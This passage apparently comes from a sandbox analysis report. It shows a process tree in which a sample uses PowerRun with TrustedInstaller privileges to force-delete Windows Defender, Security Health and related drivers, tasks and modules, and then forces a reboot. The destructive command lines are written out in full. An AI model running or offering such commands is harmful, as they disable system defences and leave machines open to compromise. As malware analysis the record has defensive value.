      PowerRun cmd.exe /c del /f ""C:\Windows\SysWOW64\DeviceCensus.exe""
      4⤵
      PID:732
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\SysWOW64\DeviceCensus.exe""
        5⤵
        
        PID:4960
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\SysWOW64\DeviceCensus.exe""
        6⤵
        
        PID:892
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\SysWOW64\DeviceCensus.exe""
        7⤵
        
        PID:3952
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\SysWOW64\CompatTelRunner.exe""
      4⤵
      PID:1960
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\SysWOW64\CompatTelRunner.exe""
        5⤵
        
        PID:4596
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\SysWOW64\CompatTelRunner.exe""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3928
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\SysWOW64\CompatTelRunner.exe""
        7⤵
        
        PID:2472
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\system32\drivers\msseccore.sys""
      4⤵
      PID:3352
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\system32\drivers\msseccore.sys""
        5⤵
        
        PID:1348
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\system32\drivers\msseccore.sys""
        6⤵
        
        PID:960
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\system32\drivers\msseccore.sys""
        7⤵
        
        PID:1768
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\system32\drivers\MsSecFltWfp.sys""
      4⤵
      PID:5032
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\system32\drivers\MsSecFltWfp.sys""
        5⤵
        
        PID:2276
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\system32\drivers\MsSecFltWfp.sys""
        6⤵
        
        PID:1232
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\system32\drivers\MsSecFltWfp.sys""
        7⤵
        
        PID:2176
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\system32\drivers\MsSecFlt.sys""
      4⤵
      PID:5100
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\system32\drivers\MsSecFlt.sys""
        5⤵
        
        PID:756
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\system32\drivers\MsSecFlt.sys""
        6⤵
        
        PID:3912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\system32\drivers\MsSecFlt.sys""
        7⤵
        
        PID:1676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3428
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy" /s /q
      4⤵
      PID:4940
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy" /s /q
        5⤵
        
        PID:4460
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy" /s /q
        6⤵
        
        PID:1868
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy" /s /q
        7⤵
        
        PID:2300
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Defender" /s /q
      4⤵
      PID:2988
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Defender" /s /q
        5⤵
        
        PID:3336
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Defender" /s /q
        6⤵
        
        PID:3584
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\ProgramData\Microsoft\Windows Defender" /s /q
        7⤵
        
        PID:2224
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection" /s /q
      4⤵
      PID:4900
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection" /s /q
        5⤵
        
        PID:1952
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection" /s /q
        6⤵
        
        PID:2816
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection" /s /q
        7⤵
        
        PID:5064
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Program Files (x86)\Windows Defender Advanced Threat Protection" /s /q
      4⤵
      PID:3752
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Program Files (x86)\Windows Defender Advanced Threat Protection" /s /q
        5⤵
        
        PID:1536
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Program Files (x86)\Windows Defender Advanced Threat Protection" /s /q
        6⤵
        
        PID:2796
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Program Files (x86)\Windows Defender Advanced Threat Protection" /s /q
        7⤵
        
        PID:4464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4428
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Program Files\Windows Defender Advanced Threat Protection" /s /q
      4⤵
      PID:2492
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Program Files\Windows Defender Advanced Threat Protection" /s /q
        5⤵
        
        PID:3900
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Program Files\Windows Defender Advanced Threat Protection" /s /q
        6⤵
        
        PID:4912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Program Files\Windows Defender Advanced Threat Protection" /s /q
        7⤵
        
        PID:4936
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Security Health" /s /q
      4⤵
      PID:2892
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Security Health" /s /q
        5⤵
        
        PID:4572
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\ProgramData\Microsoft\Windows Security Health" /s /q
        6⤵
        
        PID:3516
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\ProgramData\Microsoft\Windows Security Health" /s /q
        7⤵
        
        PID:3584
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\ProgramData\Microsoft\Storage Health" /s /q
      4⤵
      PID:4240
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\ProgramData\Microsoft\Storage Health" /s /q
        5⤵
        
        PID:3972
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\ProgramData\Microsoft\Storage Health" /s /q
        6⤵
        
        PID:4016
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\ProgramData\Microsoft\Storage Health" /s /q
        7⤵
        
        PID:3556
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\WINDOWS\System32\drivers\wd" /s /q
      4⤵
      PID:2176
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\WINDOWS\System32\drivers\wd" /s /q
        5⤵
        
        PID:1528
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\WINDOWS\System32\drivers\wd" /s /q
        6⤵
        
        PID:3116
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\WINDOWS\System32\drivers\wd" /s /q
        7⤵
        
        PID:3508
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Program Files (x86)\Windows Defender" /s /q
      4⤵
      PID:1128
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Program Files (x86)\Windows Defender" /s /q
        5⤵
        
        PID:4672
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Program Files (x86)\Windows Defender" /s /q
        6⤵
        
        PID:4356
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Program Files (x86)\Windows Defender" /s /q
        7⤵
        
        PID:5116
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Program Files\Windows Defender" /s /q
      4⤵
      PID:4508
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Program Files\Windows Defender" /s /q
        5⤵
        
        PID:2200
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Program Files\Windows Defender" /s /q
        6⤵
        
        PID:2828
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Program Files\Windows Defender" /s /q
        7⤵
        
        PID:4908
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\SecurityHealth" /s /q
      4⤵
      PID:1884
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\SecurityHealth" /s /q
        5⤵
        
        PID:4484
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\SecurityHealth" /s /q
        6⤵
        
        PID:724
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\SecurityHealth" /s /q
        7⤵
        
        PID:3200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\WebThreatDefSvc" /s /q
      4⤵
      PID:3604
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\WebThreatDefSvc" /s /q
        5⤵
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\WebThreatDefSvc" /s /q
        6⤵
        
        PID:876
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\WebThreatDefSvc" /s /q
        7⤵
        
        PID:3512
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\Sgrm" /s /q
      4⤵
      PID:1788
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\Sgrm" /s /q
        5⤵
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\Sgrm" /s /q
        6⤵
        
        PID:3360
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\Sgrm" /s /q
        7⤵
        
        PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim" /s /q
      4⤵
      PID:3664
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim" /s /q
        5⤵
        
        PID:2460
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim" /s /q
        6⤵
        
        PID:4880
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\Containers\WindowsDefenderApplicationGuard.wim" /s /q
        7⤵
        
        PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
      4⤵
      PID:5072
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
        5⤵
        
        PID:3128
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
        6⤵
        
        PID:5060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
        7⤵
        
        PID:5056
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
      4⤵
      PID:2160
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
        5⤵
        
        PID:2740
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
        6⤵
        
        PID:3440
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance" /s /q
        7⤵
        
        PID:4356
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender" /s /q
      4⤵
      PID:4484
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender" /s /q
        5⤵
        
        PID:1796
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender" /s /q
        6⤵
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender" /s /q
        7⤵
        
        PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender" /s /q
      4⤵
      PID:3108
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender" /s /q
        5⤵
        
        PID:3336
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender" /s /q
        6⤵
        
        PID:2988
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\Tasks_Migrated\Microsoft\Windows\Windows Defender" /s /q
        7⤵
        
        PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender" /s /q
      4⤵
      PID:3376
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender" /s /q
        5⤵
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender" /s /q
        6⤵
        
        PID:4804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender" /s /q
        7⤵
        
        PID:2064
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender" /s /q
      4⤵
      PID:3412
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender" /s /q
        5⤵
        
        PID:936
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender" /s /q
        6⤵
        
        PID:2944
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender" /s /q
        7⤵
        
        PID:4816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3608
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\System32\HealthAttestationClient" /s /q
      4⤵
      PID:3192
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\System32\HealthAttestationClient" /s /q
        5⤵
        
        PID:2608
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\System32\HealthAttestationClient" /s /q
        6⤵
        
        PID:732
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\System32\HealthAttestationClient" /s /q
        7⤵
        
        PID:952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\GameBarPresenceWriter" /s /q
      4⤵
      PID:3108
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\GameBarPresenceWriter" /s /q
        5⤵
        
        PID:4012
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\GameBarPresenceWriter" /s /q
        6⤵
        
        PID:1060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\GameBarPresenceWriter" /s /q
        7⤵
        
        PID:724
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\bcastdvr" /s /q
      4⤵
      PID:3076
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\bcastdvr" /s /q
        5⤵
        
        PID:4796
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\bcastdvr" /s /q
        6⤵
        
        PID:452
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\bcastdvr" /s /q
        7⤵
        
        PID:4908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4804
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c rmdir "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim" /s /q
      4⤵
      PID:4132
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c rmdir "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim" /s /q
        5⤵
        
        PID:3312
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c rmdir "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim" /s /q
        6⤵
        
        PID:1012
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c rmdir "C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim" /s /q
        7⤵
        
        PID:2816
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 10
      4⤵
      Delays execution with timeout.exe
      PID:1968
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r /f /t 0
